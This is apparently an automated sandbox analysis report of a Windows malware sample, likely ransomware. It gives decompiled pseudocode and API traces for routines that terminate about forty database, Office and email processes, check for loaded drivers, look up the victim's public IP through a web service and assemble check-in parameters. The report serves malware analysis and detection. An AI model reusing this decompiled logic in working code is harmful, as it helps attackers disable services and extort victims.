                                        				void* _t65;
                                        				void* _t70;
                                        				signed int _t71;
                                        				void* _t72;
                                        				signed int _t74;
                                        				void* _t76;
                                        
                                        				_t76 = (_t74 & 0xfffffff8) - 0xa4;
                                        				_v164 = L"msftesql.exe";
                                        				_v160 = L"sqlagent.exe";
                                        				_v156 = L"sqlbrowser.exe";
                                        				_v152 = L"sqlservr.exe";
                                        				_v148 = L"sqlwriter.exe";
                                        				_v144 = L"oracle.exe";
                                        				_v140 = L"ocssd.exe";
                                        				_v136 = L"dbsnmp.exe";
                                        				_v132 = L"synctime.exe";
                                        				_v128 = L"mydesktopqos.exe";
                                        				_v124 = L"agntsvc.exeisqlplussvc.exe";
                                        				_v120 = L"xfssvccon.exe";
                                        				_v116 = L"mydesktopservice.exe";
                                        				_v112 = L"ocautoupds.exe";
                                        				_v108 = L"agntsvc.exeagntsvc.exe";
                                        				_v104 = L"agntsvc.exeencsvc.exe";
                                        				_v100 = L"firefoxconfig.exe";
                                        				_v96 = L"tbirdconfig.exe";
                                        				_v92 = L"ocomm.exe";
                                        				_v88 = L"mysqld.exe";
                                        				_v84 = L"mysqld-nt.exe";
                                        				_v80 = L"mysqld-opt.exe";
                                        				_v76 = L"dbeng50.exe";
                                        				_v72 = L"sqbcoreservice.exe";
                                        				_v68 = L"excel.exe";
                                        				_v64 = L"infopath.exe";
                                        				_v60 = L"msaccess.exe";
                                        				_v56 = L"mspub.exe";
                                        				_v52 = L"onenote.exe";
                                        				_v48 = L"outlook.exe";
                                        				_v44 = L"powerpnt.exe";
                                        				_v40 = L"steam.exe";
                                        				_v36 = L"sqlservr.exe";
                                        				_v32 = L"thebat.exe";
                                        				_v28 = L"thebat64.exe";
                                        				_v24 = L"thunderbird.exe";
                                        				_v20 = L"visio.exe";
                                        				_v16 = L"winword.exe";
                                        				_v12 = L"wordpad.exe";
                                        				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
                                        				_t70 = _t49;
                                        				_v172 = _t70;
                                        				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
                                        				_t60 = _t50;
                                        				if(_t60 != 0) {
                                        					 *_t60 = 0x22c;
                                        					if(_t70 != 0xffffffff) {
                                        						_push(_t60);
                                        						Process32FirstW(_t70); // executed
                                        					}
                                        				}
                                        				_t41 = _t60 + 0x24; // 0x24
                                        				_t62 = _t41;
                                        				do {
                                        					_t71 = 0;
                                        					do {
                                        						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
                                        						if(_t51 == 0) {
                                        							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
                                        							if(_t65 != 0) {
                                        								TerminateProcess(_t65, 0);
                                        								CloseHandle(_t65);
                                        							}
                                        						}
                                        						_t71 = _t71 + 1;
                                        						_t46 = _t60 + 0x24; // 0x24
                                        						_t62 = _t46;
                                        					} while (_t71 < 0x27);
                                        					_t72 = _v172;
                                        					_t52 = Process32NextW(_t72, _t60);
                                        					_t48 = _t60 + 0x24; // 0x24
                                        					_t62 = _t48;
                                        				} while (_t52 != 0);
                                        				if(_t60 != 0) {
                                        					VirtualFree(_t60, 0, 0x8000); // executed
                                        				}
                                        				_t53 = FindCloseChangeNotification(_t72); // executed
                                        				return _t53;
                                        			}

                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0FC64862
                                        • VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 0FC6487C
                                        • Process32FirstW.KERNEL32(00000000,00000000), ref: 0FC64895
                                        • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0FC648B5
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0FC648C5
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0FC648D4
                                        • CloseHandle.KERNEL32(00000000), ref: 0FC648E1
                                        • Process32NextW.KERNEL32(?,00000000), ref: 0FC648FA
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC64913
                                        • FindCloseChangeNotification.KERNEL32(?), ref: 0FC6491A
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
                                        • String ID:
                                        • API String ID: 3023235786-0
                                        • Opcode ID: d9d20d999dc09a0e37b78bf6c9bda6b10b170ee03489e5654966fa42e4aa697f
                                        • Instruction ID: ab16657f7f43fe7fcb2553df3ea5b27f9958cc229e0f30bafb7bee9782ce717a
                                        • Opcode Fuzzy Hash: d9d20d999dc09a0e37b78bf6c9bda6b10b170ee03489e5654966fa42e4aa697f
                                        • Instruction Fuzzy Hash: 015168F500C381DFD6208F19A8CA75ABBE4BB86318F50490CE698AA252E7709C09CF56
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0FC67CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FC67EC4
                                          • Part of subcall function 0FC67CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FC67EDD
                                        • VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,74CB66A0,?), ref: 0FC66EAF
                                        • lstrlenW.KERNEL32(0FC6FF0C), ref: 0FC66EBC
                                          • Part of subcall function 0FC67EF0: InternetCloseHandle.WININET(?), ref: 0FC67F03
                                          • Part of subcall function 0FC67EF0: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0FC67F22
                                        • lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0FC6FF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0FC66EEB
                                        • wsprintfW.USER32 ref: 0FC66F03
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0FC6FF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0FC66F19
                                        • InternetCloseHandle.WININET(?), ref: 0FC66F27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
                                        • String ID: GET$ipv4bot.whatismyipaddress.com
                                        • API String ID: 4289327240-2259699238
                                        • Opcode ID: 2db78090eafd015a20e3ef7c3d642e34dbfb89742043c907d929490aeb512dca
                                        • Instruction ID: e40367ba33b0feccf787ac5c489528c5b77e4f65ed91352b04182680365b3cfb
                                        • Opcode Fuzzy Hash: 2db78090eafd015a20e3ef7c3d642e34dbfb89742043c907d929490aeb512dca
                                        • Instruction Fuzzy Hash: 6601963164C20577DB106A66AD8FF9B3B68EF85B11F000434FA05E5082DE685515D7B6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 46%
                                        			E0FC62F50(WCHAR* __ecx) {
                                        				unsigned int _v8;
                                        				char _v12;
                                        				WCHAR* _v16;
                                        				short _v2064;
                                        				long _t17;
                                        				void* _t18;
                                        				void* _t20;
                                        				WCHAR* _t23;
                                        				int _t25;
                                        				void* _t28;
                                        				unsigned int _t31;
                                        				void* _t35;
                                        				intOrPtr* _t39;
                                        				signed int _t40;
                                        
				// enumerate loaded kernel drivers (EnumDeviceDrivers) and return 1 if any driver base name
				// equals the string in __ecx (case-insensitive), otherwise 0
				_t39 = __imp__EnumDeviceDrivers;
                                        				_v16 = __ecx;
                                        				_v8 = 0;
                                        				 *_t39( &_v12, 4,  &_v8); // executed
                                        				_t17 = _v8;
                                        				if(_t17 != 0) {
                                        					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
                                        					_t35 = _t18;
                                        					if(_t35 != 0) {
                                        						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
                                        						if(_t20 == 0) {
                                        							L10:
                                        							VirtualFree(_t35, 0, 0x8000); // executed
                                        							return 0;
                                        						} else {
                                        							_t40 = 0;
                                        							_t31 = _v8 >> 2;
                                        							if(_t31 > 0) {
                                        								do {
                                        									_t23 =  &_v2064;
                                        									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
                                        									if(_t23 == 0) {
                                        										goto L9;
                                        									} else {
                                        										_t25 = lstrcmpiW( &_v2064, _v16); // executed
                                        										if(_t25 == 0) {
                                        											VirtualFree(_t35, 0, 0x8000);
                                        											return 1;
                                        										} else {
                                        											goto L9;
                                        										}
                                        									}
                                        									goto L12;
                                        									L9:
                                        									_t40 = _t40 + 1;
                                        								} while (_t40 < _t31);
                                        							}
                                        							goto L10;
                                        						}
                                        					} else {
                                        						return _t18;
                                        					}
                                        				} else {
                                        					return _t17;
                                        				}
                                        				L12:
                                        			}

                                        APIs
                                        • K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0FC62F74
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0FC62F8D
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocDeviceDriversEnumVirtual
                                        • String ID:
                                        • API String ID: 4140748134-0
                                        • Opcode ID: 2821def18e64fd35a9f72ca27c32925df46da591f3ffe66807b8f7bcdf869a13
                                        • Instruction ID: a84540aa34a75a02bd2194caed1542ecdef663683433d5b6ac3ceb6288a85ad6
                                        • Opcode Fuzzy Hash: 2821def18e64fd35a9f72ca27c32925df46da591f3ffe66807b8f7bcdf869a13
                                        • Instruction Fuzzy Hash: EB210131A08119FBDF20DE99DC82FED77BCEB44711F000196FE04E6140DB75A6159791
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph
                                        Basic blocks:
                                        • 91: fc67ce0-fc67ecb (InternetOpenW)
                                        • 92: fc67ee2-fc67ee8
                                        • 93: fc67ecd-fc67edf (InternetOpenW)
                                        Edges: 91->92, 91->93, 93->92
                                        C-Code - Quality: 100%
                                        			E0FC67CE0(void* __ecx) {
                                        				short _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				intOrPtr _v44;
                                        				intOrPtr _v48;
                                        				intOrPtr _v52;
                                        				intOrPtr _v56;
                                        				intOrPtr _v60;
                                        				intOrPtr _v64;
                                        				intOrPtr _v68;
                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				intOrPtr _v80;
                                        				intOrPtr _v84;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				intOrPtr _v96;
                                        				intOrPtr _v100;
                                        				intOrPtr _v104;
                                        				intOrPtr _v108;
                                        				intOrPtr _v112;
                                        				intOrPtr _v116;
                                        				intOrPtr _v120;
                                        				intOrPtr _v124;
                                        				intOrPtr _v128;
                                        				intOrPtr _v132;
                                        				intOrPtr _v136;
                                        				intOrPtr _v140;
                                        				intOrPtr _v144;
                                        				intOrPtr _v148;
                                        				intOrPtr _v152;
                                        				intOrPtr _v156;
                                        				intOrPtr _v160;
                                        				intOrPtr _v164;
                                        				intOrPtr _v168;
                                        				intOrPtr _v172;
                                        				intOrPtr _v176;
                                        				intOrPtr _v180;
                                        				intOrPtr _v184;
                                        				intOrPtr _v188;
                                        				intOrPtr _v192;
                                        				intOrPtr _v196;
                                        				intOrPtr _v200;
                                        				intOrPtr _v204;
                                        				intOrPtr _v208;
                                        				intOrPtr _v212;
                                        				intOrPtr _v216;
                                        				intOrPtr _v220;
                                        				short _v224;
                                        				WCHAR* _t62;
                                        				void* _t64;
                                        
                                        				_v8 = 0;
                                        				_v224 = 0x6f004d;
                                        				_v220 = 0x69007a;
                                        				_v216 = 0x6c006c;
                                        				_v212 = 0x2f0061;
                                        				_v208 = 0x2e0035;
                                        				_v204 = 0x200030;
                                        				_v200 = 0x570028;
                                        				_v196 = 0x6e0069;
                                        				_v192 = 0x6f0064;
                                        				_v188 = 0x730077;
                                        				_v184 = 0x4e0020;
                                        				_v180 = 0x200054;
                                        				_v176 = 0x2e0036;
                                        				_v172 = 0x3b0031;
                                        				_v168 = 0x570020;
                                        				_v164 = 0x57004f;
                                        				_v160 = 0x340036;
                                        				_v156 = 0x200029;
                                        				_v152 = 0x700041;
                                        				_v148 = 0x6c0070;
                                        				_v144 = 0x570065;
                                        				_v140 = 0x620065;
                                        				_v136 = 0x69004b;
                                        				_v132 = 0x2f0074;
                                        				_v128 = 0x330035;
                                        				_v124 = 0x2e0037;
                                        				_v120 = 0x360033;
                                        				_v116 = 0x280020;
                                        				_v112 = 0x48004b;
                                        				_v108 = 0x4d0054;
                                        				_v104 = 0x2c004c;
                                        				_v100 = 0x6c0020;
                                        				_v96 = 0x6b0069;
                                        				_v92 = 0x200065;
                                        				_v88 = 0x650047;
                                        				_v84 = 0x6b0063;
                                        				_v80 = 0x29006f;
                                        				_v76 = 0x430020;
                                        				_v72 = 0x720068;
                                        				_v68 = 0x6d006f;
                                        				_v64 = 0x2f0065;
                                        				_v60 = 0x350035;
                                        				_v56 = 0x30002e;
                                        				_v52 = 0x32002e;
                                        				_v48 = 0x380038;
                                        				_v44 = 0x2e0033;
                                        				_v40 = 0x370038;
                                        				_v36 = 0x530020;
                                        				_v32 = 0x660061;
                                        				_v28 = 0x720061;
                                        				_v24 = 0x2f0069;
                                        				_v20 = 0x330035;
                                        				_v16 = 0x2e0037;
                                        				_v12 = 0x360033;
				// _v224.._v12 hold a stack-built UTF-16 string (two chars per dword, terminated by _v8 = 0):
				// "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
				// used as the user agent for InternetOpenW; second call retries with INTERNET_OPEN_TYPE_DIRECT (1)
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
                                        				 *(__ecx + 4) = _t62;
                                        				if(_t62 == 0) {
                                        					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
                                        					 *(__ecx + 4) = _t64;
                                        					return _t64;
                                        				}
                                        				return _t62;
                                        			}

                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FC67EC4
                                        • InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FC67EDD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InternetOpen
                                        • String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
                                        • API String ID: 2038078732-2805935662
                                        • Opcode ID: 227d1d5479a0513349432d090e510f37f2b580f3f2ee0081288b6a91835eb252
                                        • Instruction ID: d63dbb9fdcd57da487b53ac6f17e776fc66c3774420fc36fd9a6d56382f8d89d
                                        • Opcode Fuzzy Hash: 227d1d5479a0513349432d090e510f37f2b580f3f2ee0081288b6a91835eb252
                                        • Instruction Fuzzy Hash: 5B41A8B4811359DEEB21CF919998B9EBFF5BB04748F50819ED5086B201C7F60A89CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 94 fc66f40-fc66f58 95 fc66f7c-fc66f7f 94->95 96 fc66f5a-fc66f7a lstrcatW * 4 94->96 97 fc66f81-fc66f9b lstrcatW * 4 95->97 98 fc66f9d-fc66fa1 95->98 96->95 97->98 99 fc66fa3-fc66fbd lstrcatW * 4 98->99 100 fc66fbf-fc66fc3 98->100 99->100 101 fc66fc5-fc66fdf lstrcatW * 4 100->101 102 fc66fe1-fc66fe5 100->102 101->102 103 fc66fe7-fc67001 lstrcatW * 4 102->103 104 fc67003-fc67007 102->104 103->104 105 fc67025-fc67029 104->105 106 fc67009-fc67023 lstrcatW * 4 104->106 107 fc67047-fc6704b 105->107 108 fc6702b-fc67045 lstrcatW * 4 105->108 106->105 109 fc6704d-fc67067 lstrcatW * 4 107->109 110 fc67069-fc6706d 107->110 108->107 109->110 111 fc6706f-fc67089 lstrcatW * 4 110->111 112 fc6708b-fc6708f 110->112 111->112 113 fc67091-fc670aa VirtualAlloc 112->113 114 fc670fc-fc67100 112->114 117 fc670c1-fc670cd wsprintfW 113->117 118 fc670ac-fc670bf wsprintfW 113->118 115 fc67102-fc6711c lstrcatW * 4 114->115 116 fc6711e-fc67132 lstrlenW 114->116 115->116 119 fc670d0-fc670f6 lstrcatW * 4 VirtualFree 117->119 118->119 119->114
                                        C-Code - Quality: 100%
                                        			E0FC66F40(intOrPtr* __ecx, WCHAR* _a4) {
                                        				WCHAR* _t47;
                                        				intOrPtr* _t91;
                                        				intOrPtr _t94;
                                        				WCHAR* _t96;
                                        
                                        				_t91 = __ecx;
                                        				_t96 = _a4;
                                        				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
                                        					lstrcatW(_t96,  *(__ecx + 0x88));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x84));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *_t91 != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 4));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 8));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 0x10));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x14));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 0x1c));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x20));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 0x28));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x2c));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 0x34));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x38));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 0x40));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x44));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 0x4c));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x50));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 0x58));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x5c));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
                                        					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
                                        					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
                                        					_a4 = _t47;
                                        					if(_t94 == 0) {
                                        						wsprintfW(_t47, L"undefined");
                                        					} else {
                                        						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
                                        					}
                                        					lstrcatW(_t96,  *(_t91 + 0x64));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96, _a4);
                                        					lstrcatW(_t96, "&");
                                        					VirtualFree(_a4, 0, 0x8000); // executed
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 0x78));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x7c));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
                                        				return _t96;
                                        			}
                                        0x0fc66f44
                                        0x0fc66f47
                                        0x0fc66f58
                                        0x0fc66f61
                                        0x0fc66f69
                                        0x0fc66f72
                                        0x0fc66f7a
                                        0x0fc66f7a
                                        0x0fc66f7f
                                        0x0fc66f85
                                        0x0fc66f8d
                                        0x0fc66f93
                                        0x0fc66f9b
                                        0x0fc66f9b
                                        0x0fc66fa1
                                        0x0fc66fa7
                                        0x0fc66faf
                                        0x0fc66fb5
                                        0x0fc66fbd
                                        0x0fc66fbd
                                        0x0fc66fc3
                                        0x0fc66fc9
                                        0x0fc66fd1
                                        0x0fc66fd7
                                        0x0fc66fdf
                                        0x0fc66fdf
                                        0x0fc66fe5
                                        0x0fc66feb
                                        0x0fc66ff3
                                        0x0fc66ff9
                                        0x0fc67001
                                        0x0fc67001
                                        0x0fc67007
                                        0x0fc6700d
                                        0x0fc67015
                                        0x0fc6701b
                                        0x0fc67023
                                        0x0fc67023
                                        0x0fc67029
                                        0x0fc6702f
                                        0x0fc67037
                                        0x0fc6703d
                                        0x0fc67045
                                        0x0fc67045
                                        0x0fc6704b
                                        0x0fc67051
                                        0x0fc67059
                                        0x0fc6705f
                                        0x0fc67067
                                        0x0fc67067
                                        0x0fc6706d
                                        0x0fc67073
                                        0x0fc6707b
                                        0x0fc67081
                                        0x0fc67089
                                        0x0fc67089
                                        0x0fc6708f
                                        0x0fc6709c
                                        0x0fc670a2
                                        0x0fc670a5
                                        0x0fc670aa
                                        0x0fc670c7
                                        0x0fc670ac
                                        0x0fc670b6
                                        0x0fc670bc
                                        0x0fc670d4
                                        0x0fc670dc
                                        0x0fc670e2
                                        0x0fc670ea
                                        0x0fc670f6
                                        0x0fc670f6
                                        0x0fc67100
                                        0x0fc67106
                                        0x0fc6710e
                                        0x0fc67114
                                        0x0fc6711c
                                        0x0fc6711c
                                        0x0fc67128
                                        0x0fc67132

                                        APIs
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66F61
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC66F69
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66F72
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC66F7A
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66F85
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC66F8D
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66F93
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC66F9B
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66FA7
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC66FAF
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66FB5
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC66FBD
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66FC9
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC66FD1
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66FD7
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC66FDF
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66FEB
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC66FF3
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66FF9
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC67001
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC6700D
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC67015
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC6701B
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC67023
                                        • lstrcatW.KERNEL32(?,0FC64966), ref: 0FC6702F
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC67037
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC6703D
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC67045
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC67051
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC67059
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC6705F
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC67067
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC67073
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC6707B
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC67081
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC67089
                                        • VirtualAlloc.KERNEL32(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0FC64699,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0FC6709C
                                        • wsprintfW.USER32 ref: 0FC670B6
                                        • wsprintfW.USER32 ref: 0FC670C7
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC670D4
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC670DC
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC670E2
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC670EA
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FC670F6
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC67106
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC6710E
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC67114
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC6711C
                                        • lstrlenW.KERNEL32(?,00000000,00000000,?,?,0FC64699,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC6711F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
                                        • String ID: %x%x$undefined
                                        • API String ID: 3872469520-3801831566
                                        • Opcode ID: ab0ae01d310b2c721d131ad957a09d73ef5d554e6457ea0662822167b3d3088c
                                        • Instruction ID: 76105b09341402a916408545840f5197b8a0d2034509184b0afb6823d97e03f5
                                        • Opcode Fuzzy Hash: ab0ae01d310b2c721d131ad957a09d73ef5d554e6457ea0662822167b3d3088c
